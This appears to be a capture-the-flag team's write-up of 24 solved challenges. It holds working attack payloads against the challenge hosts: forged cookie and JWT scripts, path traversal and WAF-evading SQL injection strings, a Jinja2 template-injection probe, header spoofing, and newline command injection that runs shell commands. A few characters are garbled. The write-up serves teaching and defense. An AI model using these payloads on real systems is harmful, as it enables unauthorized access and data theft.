Challenge Index
The following 24 challenges were solved during the 24-hour competition window. Arranged below in the order they were addressed during the event.
- ROT-13 Decryptor — Cryptography (Easy, 20 pts)
- Cookie Auth — Web (Medium, 300 pts)
- Staff Dashboard — Web (Medium, 350 pts)
- Hidden ZIP in PNG — Forensics (Medium, 300 pts)
- DocViewer — Web (Medium, 350 pts)
- Card Studio — Web (Medium, 350 pts)
- UserHub — Web (Medium, 350 pts)
- Suspicious Transmission — Steganography (Medium, 300 pts)
- JWT Weak Secret — Web (Medium, 300 pts)
- SQL Injection Login Bypass — Web (Medium, 300 pts)
- API Gateway — Web (Medium, 350 pts)
- ProfileHub — Web (Hard, 500 pts)
- JS Vault — Web (Easy, 100 pts)
- Source Dive — Web (Easy, 100 pts)
- Disallowed Path — Web (Easy, 100 pts)
- The Encoding Onion — Other (Medium, 300 pts)
- Redirect Maze — Web (Easy, 100 pts)
- Ping Tool — Web (Medium, 300 pts)
- Two Point Three Six Part 2 — OSINT (Easy, 50 pts)
- shinchi — Mobile (Medium, 250 pts)
- Cipher Room — Cryptography (Easy, 100 pts)
- RSA Common Factor — Cryptography (Medium, 300 pts)
- XOR Known Plaintext — Cryptography (Medium, 300 pts)
- Signing Oracle — Cryptography (Hard, 500 pts)
Web Exploitation
Cookie Auth — Web (Medium, 300 pts)
Overview
We were given a guest account and a sample session cookie. The challenge hint embedded in the page revealed the exact structure of the authentication mechanism — including how the signature was computed. That made this a targeted brute-force and forgery exercise rather than a black-box attack.
Cookie Structure
The hint disclosed the format:
Cookie: base64(json({"username": "...", "role": "...", "sig": "..."}))
Signature: MD5(secret + username + role)The signature used a prepended secret — a pattern sometimes called length-extension-prone HMAC construction. Since we had a valid guest signature, we knew the output of MD5(secret + 'guest' + 'guest'). The task was to brute-force the secret.
Brute-Forcing the Secret
We iterated common passwords against the known guest signature. The correct secret was supersecretkey.
Forging the Admin Token
With the secret in hand, we wrote a script to generate a forged admin token:
import hashlib, json, base64
SECRET = 'supersecretkey'
username, role = 'admin', 'admin'
sig = hashlib.md5((SECRET + username + role).encode()).hexdigest()
payload = json.dumps({'username': username, 'role': role, 'sig': sig})
token = base64.b64encode(payload.encode()).decode()
print('Set cookie: session_token =', token)We set the forged token in the browser cookie, refreshed the page, and accessed /admin to retrieve the flag.
Key Takeaways
- MD5(secret + data) is not a secure HMAC construction — use HMAC-SHA256 properly
- Disclosing the signature algorithm in a client-visible hint reduces this to a brute-force problem
- Custom cookie-based auth should use established libraries, not hand-rolled crypto
- Once a secret is known, any number of valid tokens can be forged for arbitrary roles
Staff Dashboard — Web (Medium, 350 pts)
Overview
This challenge dropped us into an internal staff dashboard where each team member had their own profile, private notes, and workspace. We were handed guest credentials and told the admin had properly isolated user data. Classic challenge setup — in other words, it hadn't.
Initial Foothold
First move was to log in as the guest user and observe how the application established identity:
curl -siL -X POST http://chall-e1c23987.evt-246.glabs.ctf7.com/login \-d "username=guest&password=guest123" \
-c /tmp/idor_cookies.txt -b /tmp/idor_cookies.txt
After logging in, the server set a session cookie. We immediately threw that value into a Base64 decoder:
Cookie value: eyJ1c2VyX2lkIjogMX0=
Decoded: {"user_id": 1}No signature. No HMAC. Just a plain JSON object encoded in Base64, sitting in the browser cookie jar like it belonged there. That told us everything we needed to know.
IDOR Discovery
Poking around the dashboard HTML, we spotted that profile data was fetched from a numeric API endpoint:
GET /api/user/1We called it directly using our guest session to confirm it returned our own profile. Then we incremented the ID by one:
curl -si http://chall-e1c23987.evt-246.glabs.ctf7.com/api/user/2 \-H "Cookie: session_token=eyJ1c2VyX2lkIjogMX0="
The server handed back the admin's full profile — no authorization check, no ownership validation. Pure IDOR. The application verified that a user was logged in, but never verified whether that user was allowed to access the requested resource.
Session Forgery (Alternative Path)
Since the session cookie was unsigned Base64, we could also impersonate the admin by forging it directly:
# Forge admin cookie
echo -n '{"user_id": 2}' | base64
# Result: eyJ1c2VyX2lkIjogMn0=
curl -si http://chall-e1c23987.evt-246.glabs.ctf7.com/dashboard \-H "Cookie: session_token=eyJ1c2VyX2lkIjogMn0="
This loaded the admin dashboard directly. Either path — direct IDOR on the API or forged session cookie — led to the same outcome. The flag was sitting in the admin's notes field.
Key Takeaways
- IDOR flaws arise when authorization is never checked server-side — authentication alone is not enough
- Base64 is encoding, not encryption — never use it to protect sensitive session data
- Client-side identity claims must always be validated and cryptographically signed
- Numeric sequential IDs in API endpoints are a red flag for IDOR during recon
Hidden ZIP in PNG — Forensics (Medium, 300 pts)
Overview
A PNG image that rendered as a normal gradient picture. The challenge description mentioned that there might be more past the end of the image. That's a classic forensics hint for polyglot files — specifically, data appended after the PNG's IEND chunk.
Enumeration
We started with exiftool for metadata extraction:
exiftool challenge.pngKey findings:
Comment: password=ctf72026
Warning: Trailer data after PNG IEND chunk
The file had two immediate giveaways: a password embedded in the image comment field, and a warning about extra data appended after the valid PNG structure. That extra data was the target.
Extraction
We ran binwalk to identify and extract the embedded archive:
binwalk -e challenge.png
Output:21236 0x52F4 Zip archive data, encrypted, name: flag.txt
21409 0x53A1 End of Zip archive
binwalk extracted the ZIP file. We then decrypted it using the password found in the image metadata:
unzip hidden.zip
Enter password: ctf72026The archive contained flag.txt, which held the flag.
Key Takeaways
- PNG IEND warnings are a strong indicator of appended data — always run binwalk on suspicious images
- Metadata fields like comments, author, and GPS data are frequently used to hide clues in forensics challenges
- Polyglot files (valid as two formats simultaneously) are a common forensics technique
- exiftool + binwalk is the standard first-pass forensics toolkit for image challenges
DocViewer — Web (Medium, 350 pts)
Overview
An internal documentation portal with a file viewer for accessing guides, API references, and deployment files. The application claimed to restrict file access to a designated documentation directory. Our job was to test whether that restriction held up under scrutiny.
Analysis
File viewers that accept user-controlled paths are a classic path traversal target. The application's claim of directory restriction implied some filtering was in place — but filtering without proper path normalization is rarely airtight. The key question was: does the app validate the path before or after resolving it?
Testing & Exploitation
We began with basic directory traversal sequences to probe the filter:
../
../../
../../../etc/passwd
../../../../flag.txtSome of these were blocked outright. We then introduced URL-encoded variants, since many filters check raw input but decode it before the actual file access:
%2e%2e%2f%2e%2e%2fflag.txt (URL encoded)
%252e%252e%252f%252e%252e%252fflag.txt (Double encoded)The encoded traversal sequences slipped through the filter. Once the server decoded the path, it resolved to a valid traversal outside the documentation directory. By testing incrementally deeper paths, we located and retrieved the flag file.
Key Takeaways
- Path filters must operate on normalized, decoded paths — not raw input strings
- Double encoding exploits servers that decode input twice before processing
- Whitelist-based path validation (e.g. canonical path checks) is safer than blacklisting traversal patterns
- Always test URL-encoded and double-encoded variants when a direct traversal is blocked
Card Studio — Web (Medium, 350 pts)
Overview
A digital greeting card generator that let users input a recipient name and message, then rendered a card preview. The challenge description boasted about its 'powerful template engine' — which, as it turned out, was a hint rather than a feature.
Identifying the Vulnerability
Any time a challenge mentions a template engine rendering user input, Server-Side Template Injection (SSTI) goes straight to the top of the test list. We tried the classic canary payload in the 'To' field:
{{7*7}}The generated card preview displayed:
Dear 49,
The expression was evaluated server-side. The output syntax was a textbook Jinja2 response, confirming we were looking at a Flask application with an unescaped render_template_string call.
Exploitation
Rather than going straight for RCE, we first checked what context objects were accessible within the template. In Flask, config is a globally accessible object that exposes the application's configuration dictionary:
{{config}}The server's response contained the full app configuration — and the flag was stored directly inside it. No command execution needed.
Why the Code Was Vulnerable
The vulnerable pattern in Flask looks like this:
# VULNERABLE
template = f"Dear {name},\n{message}"
return render_template_string(template)
# SAFE
return render_template_string(
"Dear {{ name }},\n{{ message }}",
name=name, message=message)
When user input is interpolated directly into the template string, Jinja2 treats it as executable template code. Passing it as a context variable instead renders it as inert data.
Key Takeaways
- Never pass raw user input into render_template_string() — use context variables
- SSTI in Jinja2 often doesn't require RCE — sensitive config data is frequently accessible directly
- Template engine error messages and math evaluation outputs are key SSTI indicators
- {{config}} is one of the fastest ways to extract secrets in a Flask SSTI scenario
UserHub — Web (Medium, 350 pts)
Overview
A user profile page with basic update functionality. The goal was to escalate privileges to admin. The description hinted at a flaw in how the backend handled incoming data — which pointed directly toward Mass Assignment.
Recon
We opened browser DevTools and watched the network traffic while updating the profile name. The update triggered a POST request to /api/profile carrying a minimal JSON body:
{"name": "user"}The endpoint only sent a name field — but that didn't mean the backend only accepted a name field.
Exploitation
Mass assignment vulnerabilities exist when a backend framework binds incoming request data directly to model objects without filtering which fields are allowed. We tested whether the server would accept additional fields by injecting a role parameter directly from the browser console:
fetch('/api/profile', {method: 'PUT',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ "name": "user", "role": "admin" })
})
The server accepted the payload without complaint, responded with a success message, and our account was now flagged as admin. Accessing the admin panel returned the flag.
Key Takeaways
- Mass assignment occurs when backends bind user-controlled JSON fields directly to internal models
- Always use DTOs or explicit field allowlists to restrict which parameters can be bound
- Switching HTTP methods (POST to PUT) sometimes triggers different — and less restricted — code paths
- Checking adjacent fields in a JSON API body is a fast way to probe for privilege escalation
API Gateway — Web (Medium, 350 pts)
Overview
An API gateway using a reverse proxy architecture where nginx handled role assignments before requests reached the backend. The documentation stated that user roles were set exclusively by the proxy — and there was no way to tamper with them from outside. That claim deserved testing.
Recon
The interactive API documentation exposed three endpoints:
POST /api/login → Returns JWT on authentication
GET /api/profile → Requires valid Bearer token
GET /api/admin/flag → Restricted (not documented, found via recon)We focused on the admin endpoint. The challenge description mentioned that nginx injected role headers — which immediately raised the question: can we inject those headers ourselves?
Exploitation
Reverse proxies commonly communicate backend role information through headers like X-Forwarded-Role, X-User-Role, or X-Forwarded-User. If the backend blindly trusted these without verifying they came from the proxy, we could supply them directly:
curl http://chall-708fcc09.evt-246.glabs.ctf7.com/api/admin/flag \-H "X-Forwarded-Role: admin"
The server responded with a success message and the flag — no authentication token required. The backend was trusting a header that any client could set, rather than enforcing that the header originated from the internal proxy.
Key Takeaways
- Internal proxy headers like X-Forwarded-Role must never be trusted from external clients
- Backends should only accept trusted headers from known internal IP ranges or after stripping them at the gateway
- Undocumented endpoints can often be guessed from naming patterns (/admin, /internal, /debug)
- This is a real-world misconfiguration pattern seen in production architectures
ProfileHub — Web (Hard, 500 pts)
Overview
ProfileHub v2.4.1 implemented client-side input validation through a WebAssembly (WASM) module, claiming that it ensured no malicious input could reach the backend. The objective was to access the restricted admin panel despite these defenses.
Analysis
The first thing we established was that all validation logic ran on the client side — meaning it existed in our browser, under our control. WASM adds a layer of obfuscation compared to plain JavaScript, but it changes nothing about the fundamental security model: if validation only runs client-side, it can be bypassed.
Bypass Strategy
Instead of trying to reverse the WASM module, we took the more direct route. Using browser DevTools (Network tab), we monitored the requests being sent after the WASM validation passed. The plan was to let the WASM sanitize the input, then intercept and modify the outgoing HTTP request before it left the browser.
By intercepting the request in the Network tab and manually editing the payload — injecting role-based fields or privilege markers that the WASM would have stripped — we bypassed the validation layer entirely. The backend, which trusted that the client had done its job, accepted the modified request without question.
This granted us admin privileges and access to the panel containing the flag.
Key Takeaways
- Client-side validation is a UX feature, not a security control — it can always be bypassed
- WebAssembly does not make client-side logic secure; it only makes it harder to read
- All trust decisions must be enforced server-side, independent of what the client sends
- Browser DevTools network interception is often faster than reversing a WASM binary
SQL Injection Login Bypass — Web (Medium, 300 pts)
Overview
A login page protected by a Web Application Firewall that aggressively filtered SQL injection payloads. The challenge was less about the injection itself and more about finding a bypass that didn't need the characters the WAF was watching for.
WAF Fingerprinting
Standard SQLi payloads were met with 403 Forbidden responses. The WAF appeared to be blocking:
admin' OR 1=1# → 403 Forbidden
admin'/**/OR/**/1=1# → 403 Forbidden
admin' AND 1=1 — → 403 Forbidden
URL-encoded variants → 403 Forbidden
SQL keywords (OR, AND, UNION, SELECT), comment syntax (#, — , /**/) and most standard comparison operators were all blocked or filtered.
The Bypass
The key insight was that SQL string comparisons don't need a comment to terminate the query — if the WHERE clause is structured as a string comparison, we can close both halves naturally without appending anything after:
username = admin' or '1'='1
password = anythingThis payload evaluates to a WHERE clause like: WHERE username='admin' or Ƈ'=Ƈ' AND password='anything' — where the always-true string comparison bypasses authentication. Crucially, no comment syntax is required because the surrounding quotes are balanced, so the WAF had nothing obvious to block. The login succeeded and the flag was returned.
Key Takeaways
- WAF evasion often comes down to restructuring payloads rather than encoding them
- String-based SQL injection can bypass comment-blocking WAFs by avoiding comments entirely
- Balanced quote payloads are a cleaner evasion technique against keyword-focused filters
- Always test variations of a known working payload when initial attempts are blocked
JWT Weak Secret — Web (Medium, 300 pts)
Overview
A login endpoint that issued JWTs upon authentication. The token was used to authorize requests, and the challenge involved cracking the weak signing secret and forging an admin token.
Extracting the Token
We logged in via a POST request to obtain the initial JWT:
curl -X POST http://<target>/login \-d 'username=guest&password=guest123'
The response returned a JWT in the standard three-part format (header.payload.signature).
Cracking the Secret
JWTs signed with HMAC algorithms (HS256) are only as secure as the secret key. We ran the token through hashcat with a common password wordlist:
hashcat -a 0 -m 16500 <jwt_token> wordlist.txt
Hashcat cracked the secret almost immediately: secret123. A short, dictionary-guessable key completely undermines JWT security regardless of the algorithm used.
Forging the Admin Token
With the secret known, we headed to jwt.io, decoded the token, changed the role claim to admin and the username to admin, re-signed it using the cracked secret, and sent the forged token in the Authorization header:
curl -X GET http://<target>/admin \-H 'Authorization: Bearer <forged_admin_jwt>'
The server accepted the forged token and returned the flag.
Key Takeaways
- JWT secrets must be long, random, and stored securely — dictionary words are trivially crackable
- hashcat with mode 16500 is specifically designed for JWT cracking
- Once the signing secret is known, any JWT claim can be forged without detection
- Consider asymmetric algorithms (RS256, ES256) to eliminate shared-secret risks entirely
Source Dive — Web (Easy, 100 pts)
Overview
A polished marketing site for a fictional cloud platform — NexusCloud. The challenge description hinted that the engineering team 'shipped a little more than intended.' In practice, that meant developer artifacts left in production.
Approach & Solve
We started with the most common source-code exposure pattern: the JavaScript source map. Production bundles often retain a reference to their source map file at the bottom of the minified bundle:
# Check the JS bundle
http://chall-bec76e05.evt-246.glabs.ctf7.com/static/app.bundle.js
# Last line of the bundle://# sourceMappingURL=app.bundle.js.map
Following that reference, we fetched the .map file directly:
http://chall-bec76e05.evt-246.glabs.ctf7.com/static/app.bundle.js.mapSource maps contain the original, unminified source code — comments, variable names, and all. Searching through it, we found the flag embedded in the source.
Key Takeaways
- Source maps should never be deployed to production environments — they expose the original codebase
- Browser DevTools → Sources panel reveals sourceMappingURL comments automatically
- Frontend asset auditing is a fast and often overlooked recon step
JS Vault — Web (Easy, 100 pts)
Overview
A vault page that accepted a passcode. The real content was protected — or so it appeared. The protection was a JavaScript file full of obfuscated code that we could read directly in the browser's Network tab.
Solving It
Opening the Network tab while loading the page revealed vault.js being fetched. The obfuscated logic was easy to read once you understood the pattern:
window._vaultData = _0x3fa1;
function _0x3fa1() {
var _0xc = _0x4a7b.concat(_0x8f2c).concat(_0x1d9e);
return _0xc.map(function(_0xe) {
return String.fromCharCode(_0xe);}).join('');
}
The function concatenated three numeric arrays and converted each number to its ASCII character equivalent. We extracted the three arrays from the source:
_0x4a7b = [99,116,102,55,123,106,115,95,115,101]
_0x8f2c = [99,114,101,116,95,101,120,112,111,115]
_0x1d9e = [101,100,95,54,56,54,50,99,48,48,102,125]Converting each number to its ASCII character and joining them produced the flag directly. No vault cracking needed — the flag was stored in the JavaScript the whole time.
Key Takeaways
- Client-side JavaScript obfuscation is not a security layer — the code runs in the user's browser
- ASCII-to-character array patterns are among the most common obfuscation techniques
- Browser DevTools → Sources is your first stop for any client-side protection
Disallowed Path — Web (Easy, 100 pts)
Overview
A file access system that explicitly blocked direct requests to sensitive paths like /flag.txt. The challenge name was a nudge — the path was disallowed, but only if you asked for it the obvious way.
Approach
Direct traversal payloads using ../ were caught by the filter. The application was clearly checking for known-bad patterns in the raw input string. However, the check happened on the raw string — not on the decoded or normalized version. This is the classic mistake that makes encoding-based bypasses work.
Direct attempt: ../../../flag.txt → Blocked
URL encoded: %2e%2e%2f%2e%2e%2fflag.txt → Bypassed
Double encoded: %252e%252e%252f… → Also tested
The URL-encoded payload slipped past the filter. The server decoded %2e → . and %2f → / after validation, turning the payload into a valid traversal path on the filesystem. The flag file was retrieved from outside the restricted directory.
Key Takeaways
- Filters must normalize and decode input before validation — checking raw strings is insufficient
- %2e%2e%2f is the URL-encoded form of ../ and bypasses many naive path filters
- Double encoding (%252e) exploits systems that decode input twice in a pipeline
- Canonical path resolution (realpath + prefix check) is the correct server-side fix
Redirect Maze — Web (Easy, 100 pts)
Overview
Warpgate appeared to be a normal redirect demo. The final landing page showed nothing of interest — because the flag was never on the final page. It was distributed across a chain of intermediate HTTP 302 responses, piece by piece, in a custom header that browsers silently discard when following redirects.
Analysis
The homepage contained a single link pointing to /maze/1. Requesting it with a standard browser followed all the redirects automatically and landed on /maze/finish — which showed nothing useful. The key was to disable redirect following and inspect each intermediate response individually.
We traced the redirect chain manually, extracting the X-Flag-Part header from each hop:
HOP 1 /maze/1 X-Flag-Part: 1:[FLAG REDACTED]
HOP 6 /maze/finish 200 OK (no flag here)
Solve Script
We wrote a Python script to automate the chain traversal and reconstruct the flag:
import requests
from urllib.parse import urljoin
base = 'http://chall-a9b6107d.evt-246.glabs.ctf7.com/'
url = urljoin(base, '/maze/1')
parts = {}for _ in range(20):
resp = requests.get(url, allow_redirects=False, timeout=15)
part = resp.headers.get('X-Flag-Part')if part:
idx, val = part.split(':', 1)parts[int(idx)] = val
if resp.is_redirect:
url = urljoin(url, resp.headers['Location'])else:
break
print(''.join(parts[k] for k in sorted(parts)))Key Takeaways
- Intermediate HTTP redirect responses are full HTTP responses with their own headers — inspect them
- curl -v or requests with allow_redirects=False are essential for redirect chain analysis
- Browsers hide redirect metadata from users by design — manual tooling is needed
Ping Tool — Web (Medium, 300 pts)
Overview
A web-based ping utility. The server executed OS-level ping commands based on user-provided IP addresses. A WAF was in place to filter obvious injection characters. The challenge was to find a separator the WAF missed.
WAF Fingerprinting
Standard command injection separators were all blocked:
ip=8.8.8.8;id → WAF blocked
ip=8.8.8.8|id → WAF blocked
ip=8.8.8.8&&id → WAF blockedNormal pings worked fine — the WAF wasn't killing the whole functionality, just watching for the obvious separators. That meant the underlying shell execution was still happening.
The Bypass — Newline Injection
In Unix shells, a newline character (\n) is a valid command separator — just like a semicolon. The WAF was filtering visible characters but not URL-encoded control characters. We sent %0a (URL-encoded newline) as the separator:
curl -s -X POST $URL/ping -d "ip=8.8.8.8%0aid"The response included the output of both the ping and the id command. The process was running as root (uid=0) — a serious misconfiguration on top of the injection itself. From there, we located and read the flag:
# Locate the flag
ip=8.8.8.8%0afind / -name "flag*"
# Read it
ip=8.8.8.8%0acat /flag.txtKey Takeaways
- URL-encoded newlines (%0a) are a common WAF bypass for command injection — filter \n, not just ;|&&
- Running a web-facing tool as root is a critical misconfiguration that magnifies any injection flaw
- Command injection WAFs should block at the execution layer too (restricted shell, subprocess without shell=True)
Cryptography
ROT-13 Decryptor — Cryptography (Easy, 20 pts)
Overview
This was a warmup cryptography challenge — exactly the kind you want to crack open early on to get the scoreboard moving. A garbled transmission was provided with the hint that a simple shift cipher was used. The ciphertext prefix pgs7 was the dead giveaway.
Approach
ROT13 is a Caesar cipher locked at a shift of 13. We noticed the prefix pgs7 in the ciphertext — rotating each letter forward by 13 positions gives ctf7, instantly confirming ROT13 as the cipher in use. The rest of the decode followed trivially: we applied ROT13 to the full ciphertext.
Ciphertext:
pgs7{Guvf_vf_ubyr_cebbs}
Decoding the text within the braces:
G → T u → h v → i f → s (Guvf → This)
v → i f → s (vf → is)
u → h b → o y → l r → e (ubyr → hole)
c → p e → r b → o b → o (cebbs → proof)
The decoded message reads: This_is_hole_proof — a clear confirmation of successful decryption. The flag was obtained directly from the decoded output.
Key Takeaways
- ROT13 is its own inverse — encoding and decoding use the same operation
- Recognizing the mangled ctf7 prefix as pgs7 is the fastest way to identify the cipher
- ROT13 appears frequently in easy CTF warmups as an encoding layer inside harder challenges too
Cipher Room — Cryptography (Easy, 100 pts)
Overview
A ciphertext that appeared to use a Caesar cipher — but the obvious shift didn't produce meaningful output. The actual shift value was hidden in the HTML source of the challenge page.
Initial Attempt
Looking at the ciphertext prefix tkw7, we expected it to decode to ctf7. That suggested a shift of +9. Applying a -9 shift to the full ciphertext produced partial output that looked shifted but not meaningful — confirming the wrong shift was used.
Finding the Correct Shift
The challenge description hinted that 'encryption parameters are hidden in the page metadata.' Inspecting the page HTML source revealed:
<meta name="cipher-shift" content="17">
Decrypting with a shift of -17 produced readable output with leet-speak substitutions (1 → i, 3 → e). The decrypted phrase translated to 'hidden in cipher', confirming the correct key.
Key Takeaways
- Always check HTML source and meta tags for hints — challenge authors often embed parameters there
- When a Caesar cipher produces a 'close but wrong' result, try all 25 possible shifts systematically
- Leet-speak substitutions (1→i, 3→e) are frequently used in CTF flag strings to add an encoding layer
XOR Known Plaintext — Cryptography (Medium, 300 pts)
Overview
A service that encrypted arbitrary hex-encoded plaintexts using a 'military-grade XOR encryption' — a repeating-key XOR cipher. The target ciphertext was provided upfront. The vulnerability: keystream reuse.
Analysis
XOR with a repeating key is only secure if the key is never reused across different messages. Since the service would encrypt any input we provided using the same underlying key, we could extract the full keystream by encrypting a known plaintext of null bytes. XOR logic dictates:
Plaintext XOR Keystream = Ciphertext0x00 XOR Keystream = Keystream ← encrypting null bytes dumps the key
Extraction & Decryption
The target ciphertext was 32 bytes (64 hex characters). We sent 64 null hex characters to the ENCRYPT command:
ENCRYPT 0000000000000000000000000000000000000000000000000000000000000000
Response: 3bf5ca72f13bf5ca72f13bf5ca72f13bf5ca72f13bf5ca72f13bf5ca72f13bf5
The keystream repeated every 5 bytes (3bf5ca72f1), confirming a short repeating key. We XOR'd the extracted keystream against the target ciphertext:
ct = bytes.fromhex(ciphertext_hex)
key = bytes.fromhex(keystream_hex)
pt = bytes(c ^ k for c, k in zip(ct, key))
print(pt.decode())The flag was recovered from the decrypted plaintext.
Key Takeaways
- Repeating-key XOR is trivially broken when the service encrypts chosen plaintexts
- Encrypting null bytes reveals the raw keystream — a direct consequence of 0 XOR K = K
- Short repeating keys leave visible patterns in the encrypted keystream output
- Key reuse across messages is the fundamental flaw in stream cipher implementations
RSA Common Factor — Cryptography (Medium, 300 pts)
Overview
We were given two RSA public keys (n1 and n2) and a ciphertext encrypted under n1. The challenge name was as direct as they come — the two moduli shared a prime factor, which makes factoring both of them trivial through a GCD computation.
The Vulnerability
RSA security relies on the difficulty of factoring n = p × q when p and q are generated independently and randomly. If two different moduli share a prime (due to a broken or seeded RNG), computing gcd(n1, n2) instantly reveals that shared prime. From there, each modulus factors completely.Exploit Script
import math
n1 = 0xef0c2d8d582ef706... # (truncated for brevity)
n2 = 0x298df6897e2a69d5... # (truncated for brevity)
e1 = 65537
ciphertext = 0x9c63d01dd818...
# Step 1: Find the shared prime via GCD
p = math.gcd(n1, n2)if p > 1:
print('[+] Shared prime found!')
q1 = n1 // p # Factor n1
phi_n1 = (p - 1) * (q1 - 1) # Euler's totient
d1 = pow(e1, -1, phi_n1) # Private key (Python 3.8+)
m = pow(ciphertext, d1, n1) # Decrypt
print(m.to_bytes((m.bit_length() + 7) // 8, 'big').decode())Running the script confirmed the shared prime, factored n1 completely, computed the private key, and decrypted the ciphertext to recover the flag.
Key Takeaways
- Never reuse prime factors across different RSA key pairs — gcd(n1, n2) > 1 breaks both instantly
- This attack requires only basic arithmetic — no factoring algorithms needed if a shared prime exists
- Weak or seeded PRNGs in key generation are a real-world threat to RSA deployments
- Python 3.8+ pow(e, -1, n) computes the modular inverse directly
Signing Oracle — Cryptography (Hard, 500 pts)
Overview
An ECDSA signing oracle running on secp256k1. The service exposed four commands: PUBKEY, SIGN, VERIFY, and FLAG. The goal was to produce a valid ECDSA signature over the SHA-256 hash of the string 'give_me_the_flag'. The expected hash was:
5c85da92bbff10629271762403f3ecd8b64022380d39ff3cfc8703930d2d72ac
Initial Analysis
Our first instinct was biased nonces or nonce reuse — two well-known ECDSA attack classes. We collected 200 signatures and analyzed the r-value bit lengths. The average was 255.1 bits, consistent with truly random nonces. No nonce reuse was detected. The actual vulnerability was simpler.
Root Cause — Direct Hash Signing
The SIGN command accepted a hex-encoded message and signed it. The critical flaw: the server signed the provided hex value directly as the message hash, without applying any internal hashing first. This meant if we sent the challenge hash to SIGN, the oracle would produce a valid ECDSA signature over exactly that value — which is precisely what FLAG required.
Exploit
One-liner solve using pwntools:
from pwn import *
import time
CHASH = '5c85da92bbff10629271762403f3ecd8b64022380d39ff3cfc8703930d2d72ac'
io = remote('212.2.250.33', 30454)time.sleep(1); io.recv(timeout=3)
# Step 1: Ask the oracle to sign the challenge hashio.sendline(('SIGN ' + CHASH).encode())
time.sleep(1)
line = io.recv(timeout=3).decode().strip()
r, s = line.split()[0], line.split()[1]
# Step 2: Submit the signature for the flagio.sendline(('FLAG ' + CHASH + ' ' + r + ' ' + s).encode())
time.sleep(2)
print(io.recv(timeout=5).decode())io.close()
Key Takeaways
- A signing oracle must hash user input internally — never accept arbitrary raw hash values
- This is the classical signing oracle attack: the oracle signs the exact challenge on the attacker's behalf
- When expected attacks (nonce reuse, lattice) show no signal, revisit the protocol logic itself
- ECDSA on secp256k1 is secure in theory; implementation flaws are where it breaks in practice
Other Categories
Suspicious Transmission — Steganography (Medium, 300 pts)
Overview
A WAV audio file that sounded like an ordinary 440 Hz sine tone — nothing unusual on first listen. The challenge also provided the source code used to generate it, which turned this from a blind stego problem into a clean reversal exercise.
Reading the Source Code
The generation code revealed the exact embedding method:
Sample rate: 8000 Hz, Duration: 2s → 16,000 total samples
Flag converted to bits (with null terminator)
Each bit embedded into the LSB (Least Significant Bit) of each sample
Modifying only the last bit of a 16-bit sample changes the audio signal by a maximum of 1/32768 — completely inaudible. The file carried the hidden message the entire time.
Extraction
We reversed the process in Python: read the audio samples, extract the LSB from each, group the bits into bytes, and decode back to ASCII:
import wave, structwith wave.open('challenge.wav', 'r') as wf:
raw = wf.readframes(wf.getnframes())
samples = struct.unpack(f'<{len(raw)//2}h', raw)
bits = [s & 1 for s in samples]
chars = []for i in range(0, len(bits) — 7, 8):
byte = 0for b in bits[i:i+8]:
byte = (byte << 1) | b
if byte == 0:break
chars.append(chr(byte))
print(''.join(chars))Running the script decoded the hidden message and produced the flag.
Key Takeaways
- LSB steganography in audio is imperceptible because 1-bit changes are below human hearing thresholds
- Provided source code in a stego challenge is almost always the intended solve path — read it carefully
- The null terminator (8 zero bits) marks the message boundary in this embedding scheme
- Stego challenges often hide data across multiple media types: images, audio, and even network captures
The Encoding Onion — Other (Medium, 300 pts)
Overview
A multi-layer encoding challenge where a string had to be peeled back through six nested transformations to reveal the flag. The challenge description provided the layer order explicitly — the difficulty was in executing each step correctly and in sequence.
Layer Order (Outer to Inner)
Base64 → Base32 → Hex → ROT13 → Reverse → Base64
Step-by-Step Decode
We decoded each layer in sequence using a Python script:
import base64, codecs
encoded = 'R05TREdNQl...' # (full encoded string)
step1 = base64.b64decode(encoded) # Layer 1: Base64
step2 = base64.b32decode(step1) # Layer 2: Base32
step3 = bytes.fromhex(step2.decode()) # Layer 3: Hex
step4 = codecs.decode(step3.decode(), 'rot_13') # Layer 4: ROT13
step5 = step4[::-1] # Layer 5: Reverse
final = base64.b64decode(step5) # Layer 6: Base64
print(final.decode())Common pitfalls here: Base32 is case-sensitive about padding, and ROT13 must be applied after hex decoding — not before. Swapping any two steps breaks the chain entirely. The final output yielded the flag.
Key Takeaways
- Multi-layer encoding challenges require strict ordering — document each output before proceeding
- ROT13 is symmetric, so codecs.decode with 'rot_13' handles both encode and decode
- Base32 decoding requires the input to be a bytes-like object — type handling in Python is critical here
- Scripting all layers together is faster and less error-prone than running each step manually
Two Point Three Six Part 2 — OSINT (Easy, 50 pts)
Overview
An OSINT challenge referencing the 26/11 Mumbai attacks. The challenge asked for the approximate time at which Ajmal Kasab was captured, with the hint that commonly reported timelines contain inconsistencies.
Approach
General search results for བ/11 Kasab captured' returned broad summaries with vague timing references. The challenge hint — 'Nobody remembers the truth correctly' — pointed toward the need for detailed incident timelines rather than news summaries. We refined our search:
Search queries used:
'Ajmal Kasab capture exact time IST'
'Kasab arrested timeline 26/11 police report'
བ/11 Kasab capture time discrepancy'
Cross-referencing multiple detailed accounts and police chronologies narrowed the capture time to approximately 01:30 AM IST — shortly after midnight on 27 November 2008. The challenge specified an 'around time', confirming that a consistent approximation was the expected answer.
Flag format: [FLAG REDACTED] → [FLAG REDACTED]
Key Takeaways
- OSINT challenges about historical events require primary sources and detailed timelines, not Wikipedia summaries
- Cross-referencing multiple reports helps resolve timing discrepancies in conflicting accounts
- Always note the exact flag format requirement — time format (12hr vs 24hr, AM/PM) is critical
shinchi — Mobile (Medium, 250 pts)
Overview
A mobile challenge requiring Android APK analysis. The challenge name itself was the first clue.
Approach
The name 'shinchi' (真七 / 七) means 'seven' in Japanese. That was the intended nudge. We sideloaded the APK onto a test device and explored the application.
The app featured a simple calculator-style interface. Entering 3 + 4 — which equals 7, the numerical meaning of shinchi — triggered a special output: a Base64-encoded string appeared on screen.
Input: 3 + 4 = 7
Output: <base64 encoded string>Decode: base64 -d <string> → Flag
Decoding the Base64 output produced the flag directly.
Key Takeaways
- Mobile challenge names frequently encode the intended input — treat them as hints
- APK sideloading for analysis is a fundamental Android CTF technique
- Hidden functionality triggered by specific inputs is a common mobile challenge design pattern